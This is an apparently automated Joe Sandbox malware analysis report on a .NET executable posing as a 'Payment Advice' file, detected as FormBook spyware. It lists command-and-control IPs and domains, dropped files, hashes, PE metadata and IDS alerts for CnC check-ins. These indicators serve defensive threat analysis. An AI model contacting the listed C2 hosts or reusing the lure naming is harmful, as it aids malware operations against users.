                                                                                      http://comect.online/hmf8/?0vE=z2LXL2HhYNX8&q0C=pGw88cWx9XO22N8aqmdn8hAka7cZrcLUASSKDY6tOoqXrK9mACfMfinger.exe, 00000009.00000002.3553337559.0000000004D40000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.00000000042D0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://www.fonts.comPayment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://www.sandoll.co.krPayment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://www.transip.nl/privacy-policy/finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://www.urwpp.deDPleasePayment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://www.transip.eu/knowledgebase/entry/5885/finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://www.zhongyicts.com.cnPayment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePayment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1867220338.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://www.sakkal.comPayment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://www.apache.org/licenses/LICENSE-2.0Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://www.fontbureau.comPayment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://transip.eu/cp/finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://transip.eu/vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://www.transip.eu/knowledgebase/entry/284-start-sending-receiving-email-domain/finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=finger.exe, 00000009.00000002.3554857180.00000000081C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://www.transip.eu/question/100000230finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://www.ecosia.org/newtab/finger.exe, 00000009.00000002.3554857180.00000000081C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://www.carterandcone.comlPayment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://trustpilot.com/review/www.transip.nlfinger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://www.transip.nl/vragen/110000580/finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://ac.ecosia.org/autocomplete?q=finger.exe, 00000009.00000002.3554857180.00000000081C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.fontbureau.com/designers/cabarga.htmlNPayment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://www.founder.com.cn/cnPayment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://www.fontbureau.com/designers/frere-user.htmlPayment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://localhost/calculator_server/requests.phpPayment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exefalse
                                                                                                                                high
                                                                                                                                https://www.transip.nl/vragen/110000572finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://www.jiyu-kobo.co.jp/Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://www.transip.eu/privacy-policy/finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    http://www.fontbureau.com/designers8Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://www.transip.nl/knowledgebase/zoeken/finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://www.transip.eu/terms-of-service/finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=finger.exe, 00000009.00000002.3554857180.00000000081C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
IP | Domain | Country | ASN | ASN Name | Malicious
124.6.61.130 | www.comect.online | Singapore | 132425 | APC-HOSTING-SGAPCHostingPteLtdSG | true
13.248.169.48 | www.hsa.world | United States | 16509 | AMAZON-02US | true
37.97.254.27 | dutchdubliners.online | Netherlands | 20857 | TRANSIP-ASAmsterdamtheNetherlandsNL | true
172.247.112.164 | ccchhua889911.222tt.icu | United States | 40065 | CNSERVERSUS | true
149.104.34.134 | hx2.vip.84dns.com | United States | 174 | COGENT-174US | true
156.253.8.115 | www.sssvip2.shop | Seychelles | 132813 | AISI-AS-APHKAISICLOUDCOMPUTINGLIMITEDHK | true
199.193.6.134 | www.allstary.top | United States | 22612 | NAMECHEAP-NETUS | true
3.33.130.190 | emirates-visa.net | United States | 8987 | AMAZONEXPANSIONGB | false
                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                          Analysis ID:1571277
                                                                                                                                          Start date and time:2024-12-09 08:47:01 +01:00
                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                          Overall analysis duration:0h 9m 58s
                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                          Report type:full
                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                          Run name:Run with higher sleep bypass
                                                                                                                                          Number of analysed new started processes analysed:11
                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                          Number of injected processes analysed:2
                                                                                                                                          Technologies:
                                                                                                                                          • HCA enabled
                                                                                                                                          • EGA enabled
                                                                                                                                          • AMSI enabled
                                                                                                                                          Analysis Mode:default
                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                          Sample name:Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe
                                                                                                                                          Detection:MAL
                                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@10/7@14/8
                                                                                                                                          EGA Information:
                                                                                                                                          • Successful, ratio: 75%
                                                                                                                                          HCA Information:
                                                                                                                                          • Successful, ratio: 96%
                                                                                                                                          • Number of executed functions: 193
                                                                                                                                          • Number of non-executed functions: 292
                                                                                                                                          Cookbook Comments:
                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                                          • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                          • Execution Graph export aborted for target vTCmFjyxUmdTJX.exe, PID 3756 because it is empty
                                                                                                                                          • Not all processes were analyzed, report is missing behavior information
                                                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                          No simulations
                                                                                                                                          Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                          No context
                                                                                                                                          Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                          No context
                                                                                                                                          No context
                                                                                                                                          Process:C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe
                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1216
                                                                                                                                          Entropy (8bit):5.34331486778365
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                          Malicious:true
                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1172
                                                                                                                                          Entropy (8bit):5.340528395411087
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:3ytWSKco4KmZjKbmOIKod6emN1s4RPQoU99t7J0gt/NKIl9iagu:itWSU4xympjms4RIoU99tK8NDv
                                                                                                                                          MD5:0C371003F140A382D5DB7F62075242C0
                                                                                                                                          SHA1:4FEE034169C86493CBE2217B93878ED8D8863857
                                                                                                                                          SHA-256:478A0B7B4158BCB3A82BA889184106FA535554FD60029868CEAAEAD754AAAC71
                                                                                                                                          SHA-512:ECB2DFC940EF150D9B33B901B9FAF36CE3269BCA775318D9E165278BA48EB3C0BC8DFADA2919163D68D2A396214BB55B9E7586B26F28A9F1F5B6D09EE1F5C944
                                                                                                                                          Malicious:false
                                                                                                                                          Process:C:\Windows\SysWOW64\finger.exe
                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):114688
                                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                          Malicious:false
                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                          Entropy (8bit):7.803865417465839
                                                                                                                                          TrID:
                                                                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                          • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                          File name:Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe
                                                                                                                                          File size:734'208 bytes
                                                                                                                                          MD5:cedbf1d5c1bc7d923f885cd24bf225c1
                                                                                                                                          SHA1:dd0e1b5cd5b14488e1f28ad127d5cd5e484a5ba2
                                                                                                                                          SHA256:58b21b1ecb14e234c09d14eb1a987f636f384ff0e1345bde2071bb87e90ae5d8
                                                                                                                                          SHA512:78a3a9bdfa2feba43bc900f829d696734b4f82fa529d4243a84e6bf562aa5c6f2b371911e744066e509242f163f32b2825918033143818cd6d9e520a5f874ebb
                                                                                                                                          SSDEEP:12288:0PGgmhOG+VQMVk/25m5TLR/O5zZZOPG2HckSRd7LL0pJKFIA:Mj3VXC25QT9/O5zfOLk7LLBn
                                                                                                                                          TLSH:8CF412A96686D907C99557380BB2F1B916B90EDDF801D2039FDD7DEBFC76E190C88082
                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...._Rg..............0.............^;... ...@....@.. ....................................@................................
                                                                                                                                          Icon Hash:04852062591b5659
                                                                                                                                          Entrypoint:0x4b3b5e
                                                                                                                                          Entrypoint Section:.text
                                                                                                                                          Digitally signed:false
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          Subsystem:windows gui
                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                          Time Stamp:0x67525F04 [Fri Dec 6 02:18:44 2024 UTC]
                                                                                                                                          TLS Callbacks:
                                                                                                                                          CLR (.Net) Version:
                                                                                                                                          OS Version Major:4
                                                                                                                                          OS Version Minor:0
                                                                                                                                          File Version Major:4
                                                                                                                                          File Version Minor:0
                                                                                                                                          Subsystem Version Major:4
                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                          Instruction
                                                                                                                                          jmp dword ptr [00402000h]
                                                                                                                                          push ebx
                                                                                                                                          add byte ptr [ecx+00h], bh
                                                                                                                                          jnc 00007FC5152B1382h
                                                                                                                                          je 00007FC5152B1382h
                                                                                                                                          add byte ptr [ebp+00h], ch
                                                                                                                                          add byte ptr [ecx+00h], al
                                                                                                                                          arpl word ptr [eax], ax
                                                                                                                                          je 00007FC5152B1382h
                                                                                                                                          imul eax, dword ptr [eax], 00610076h
                                                                                                                                          je 00007FC5152B1382h
                                                                                                                                          outsd
                                                                                                                                          add byte ptr [edx+00h], dh
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xb3b0c          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xb4000          0x13bc        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xb6000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
.text   0x2000           0xb1b84       0xb1c00   b30dc75902bd2287d426f271d9d4ac39  False     0.9361361089135021  data       7.810640968604701    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0xb4000          0x13bc        0x1400    14dcdecc73cecd8a588933840ae8051a  False     0.7326171875        data       6.944408595177701    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xb6000          0xc           0x200     92d9ef896f96697ec23b9542b942e77f  False     0.044921875         data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name           RVA      Size   Type                                                                               Language  Country  ZLIB Complexity
RT_ICON        0xb4100  0xd91  PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced                                           0.8692772818888569
RT_GROUP_ICON  0xb4ea4  0x14   data                                                                                                  1.05
RT_VERSION     0xb4ec8  0x2f4  data                                                                                                  0.43253968253968256
RT_MANIFEST    0xb51cc  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                     0.5489795918367347

DLL          Import
mscoree.dll  _CorExeMain

Timestamp                        SID      Signature                                 Severity  Source IP    Source Port  Dest IP          Dest Port  Protocol
2024-12-09T08:49:05.514764+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5  1         192.168.2.4  49768        172.247.112.164  80         TCP
2024-12-09T08:49:30.831726+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5  1         192.168.2.4  49830        13.248.169.48    80         TCP
2024-12-09T08:49:46.022760+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5  1         192.168.2.4  49868        156.253.8.115    80         TCP
2024-12-09T08:50:02.120683+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5  1         192.168.2.4  49908        37.97.254.27     80         TCP
2024-12-09T08:50:17.301606+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5  1         192.168.2.4  49947        199.193.6.134    80         TCP
2024-12-09T08:50:34.231659+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5  1         192.168.2.4  49990        149.104.34.134   80         TCP
2024-12-09T08:50:49.794564+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5  1         192.168.2.4  50029        124.6.61.130     80         TCP

Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                                                                                          Dec 9, 2024 08:49:58.355622053 CET804990137.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:58.355624914 CET804990137.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:58.355643034 CET804990137.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:58.355705023 CET804990137.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:59.457586050 CET804990137.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:59.457652092 CET804990137.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:59.457807064 CET4990180192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:49:59.742111921 CET4990180192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:00.757173061 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:00.876471043 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:00.876591921 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:00.885998964 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:01.005304098 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.120342016 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.120445013 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.120457888 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.120682955 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.120909929 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.120923042 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.120934010 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.120946884 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.121033907 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.121757030 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.121768951 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.121782064 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.121823072 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.240055084 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.240099907 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.240206957 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.312591076 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.312638044 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.312730074 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.316723108 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.316801071 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.316852093 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.325076103 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.325181961 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.325227976 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.333451986 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.333564997 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.333610058 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.341780901 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.341929913 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.341976881 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.350172997 CET804990837.97.254.27192.168.2.4
